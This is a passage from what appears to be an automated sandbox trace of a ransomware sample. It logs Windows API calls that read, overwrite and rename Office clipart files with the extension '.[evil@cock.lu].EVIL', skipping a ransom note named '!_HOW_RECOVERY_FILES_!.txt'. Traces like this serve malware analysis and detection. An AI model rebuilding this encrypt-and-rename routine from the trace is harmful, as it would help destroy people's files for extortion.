out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1a6b, lpOverlapped=0x0) returned 1 [0161.698] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.698] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.698] _errno () returned 0x84b1160840 [0161.698] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.698] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a80, lpOverlapped=0x0) returned 1 [0161.698] CloseHandle (hObject=0x1a8) returned 1 [0161.698] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.698] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.699] __uncaught_exception () returned 0x84b1160800 [0161.699] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.699] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\paper_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\paper_01.mid.[evil@cock.lu].evil")) returned 1 [0161.700] ??_V@YAXPEAX@Z () returned 0x1 [0161.703] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID", dwFileAttributes=0x200) returned 0 [0161.703] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.703] wcsstr (_Str="PARNT_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.703] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 69 [0161.703] wcscmp (_String1="PARNT_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.703] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PARNT_01.MID") returned 0x0 [0161.703] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID") returned 0x45 [0161.703] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.705] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x195b, lpOverlapped=0x0) returned 1 [0161.712] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.712] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.712] _errno () returned 0x84b1160840 [0161.712] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.712] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1960, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1960, lpOverlapped=0x0) returned 1 [0161.712] CloseHandle (hObject=0x1a8) returned 1 [0161.712] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.712] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.712] __uncaught_exception () returned 0x84b1160800 [0161.712] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.713] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_01.mid.[evil@cock.lu].evil")) returned 1 [0161.714] ??_V@YAXPEAX@Z () returned 0x1 [0161.716] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID", dwFileAttributes=0x200) returned 0 [0161.717] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.717] wcsstr (_Str="PARNT_02.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.717] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 69 [0161.717] wcscmp (_String1="PARNT_02.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.717] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PARNT_02.MID") returned 0x0 [0161.717] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 0x45 [0161.717] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.719] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1652, lpOverlapped=0x0) returned 1 [0161.728] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.728] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.728] _errno () returned 0x84b1160840 [0161.728] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.728] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1660, lpOverlapped=0x0) returned 1 [0161.728] CloseHandle (hObject=0x1a8) returned 1 [0161.728] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.729] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.729] __uncaught_exception () returned 0x84b1160800 [0161.729] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.729] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_02.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_02.mid.[evil@cock.lu].evil")) returned 1 [0161.730] ??_V@YAXPEAX@Z () returned 0x1 [0161.733] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID", dwFileAttributes=0x200) returned 0 [0161.734] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.734] wcsstr (_Str="PARNT_03.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.734] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 69 [0161.734] wcscmp (_String1="PARNT_03.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.734] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PARNT_03.MID") returned 0x0 [0161.734] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 0x45 [0161.734] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_03.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.736] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x215a, lpOverlapped=0x0) returned 1 [0161.745] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.745] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.745] _errno () returned 0x84b1160840 [0161.746] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.746] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x2160, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2160, lpOverlapped=0x0) returned 1 [0161.746] CloseHandle (hObject=0x1a8) returned 1 [0161.746] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.746] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.746] __uncaught_exception () returned 0x84b1160800 [0161.746] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.747] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_03.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_03.mid.[evil@cock.lu].evil")) returned 1 [0161.748] ??_V@YAXPEAX@Z () returned 0x1 [0161.751] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID", dwFileAttributes=0x200) returned 0 [0161.751] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.751] wcsstr (_Str="PARNT_04.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.751] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 69 [0161.751] wcscmp (_String1="PARNT_04.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.751] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PARNT_04.MID") returned 0x0 [0161.751] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 0x45 [0161.751] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_04.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.754] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x17b6, lpOverlapped=0x0) returned 1 [0161.762] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.762] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.762] _errno () returned 0x84b1160840 [0161.762] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.762] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x17c0, lpOverlapped=0x0) returned 1 [0161.763] CloseHandle (hObject=0x1a8) returned 1 [0161.763] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.763] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.763] __uncaught_exception () returned 0x84b1160800 [0161.763] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.763] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_04.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_04.mid.[evil@cock.lu].evil")) returned 1 [0161.764] ??_V@YAXPEAX@Z () returned 0x1 [0161.768] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID", dwFileAttributes=0x200) returned 0 [0161.768] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.768] wcsstr (_Str="PARNT_05.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.768] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 69 [0161.768] wcscmp (_String1="PARNT_05.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.768] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PARNT_05.MID") returned 0x0 [0161.768] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 0x45 [0161.768] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_05.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.770] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1784, lpOverlapped=0x0) returned 1 [0161.779] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.779] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.779] _errno () returned 0x84b1160840 [0161.779] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.779] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x17a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x17a0, lpOverlapped=0x0) returned 1 [0161.780] CloseHandle (hObject=0x1a8) returned 1 [0161.780] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.780] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.780] __uncaught_exception () returned 0x84b1160800 [0161.780] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.780] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_05.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_05.mid.[evil@cock.lu].evil")) returned 1 [0161.782] ??_V@YAXPEAX@Z () returned 0x1 [0161.785] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID", dwFileAttributes=0x200) returned 0 [0161.785] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.785] wcsstr (_Str="PARNT_06.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.785] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 69 [0161.785] wcscmp (_String1="PARNT_06.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.786] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PARNT_06.MID") returned 0x0 [0161.786] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 0x45 [0161.786] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_06.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.789] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1e58, lpOverlapped=0x0) returned 1 [0161.811] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.811] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.811] _errno () returned 0x84b1160840 [0161.811] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.811] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1e60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1e60, lpOverlapped=0x0) returned 1 [0161.811] CloseHandle (hObject=0x1a8) returned 1 [0161.811] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.811] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.812] __uncaught_exception () returned 0x84b1160800 [0161.812] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.812] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_06.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_06.mid.[evil@cock.lu].evil")) returned 1 [0161.813] ??_V@YAXPEAX@Z () returned 0x1 [0161.816] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID", dwFileAttributes=0x200) returned 0 [0161.817] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.841] wcsstr (_Str="PARNT_07.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.841] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 69 [0161.841] wcscmp (_String1="PARNT_07.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.841] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PARNT_07.MID") returned 0x0 [0161.841] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID") returned 0x45 [0161.841] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_07.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.843] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x19a4, lpOverlapped=0x0) returned 1 [0161.851] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.851] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.851] _errno () returned 0x84b1160840 [0161.851] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.851] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x19c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x19c0, lpOverlapped=0x0) returned 1 [0161.851] CloseHandle (hObject=0x1a8) returned 1 [0161.851] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.852] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.852] __uncaught_exception () returned 0x84b1160800 [0161.852] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.852] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_07.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_07.mid.[evil@cock.lu].evil")) returned 1 [0161.853] ??_V@YAXPEAX@Z () returned 0x1 [0161.857] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID", dwFileAttributes=0x200) returned 0 [0161.857] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.857] wcsstr (_Str="PARNT_08.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.857] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 69 [0161.857] wcscmp (_String1="PARNT_08.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.857] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PARNT_08.MID") returned 0x0 [0161.857] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 0x45 [0161.857] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_08.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.860] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1cb3, lpOverlapped=0x0) returned 1 [0161.872] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.872] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.872] _errno () returned 0x84b1160840 [0161.872] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.872] WriteFile (in: 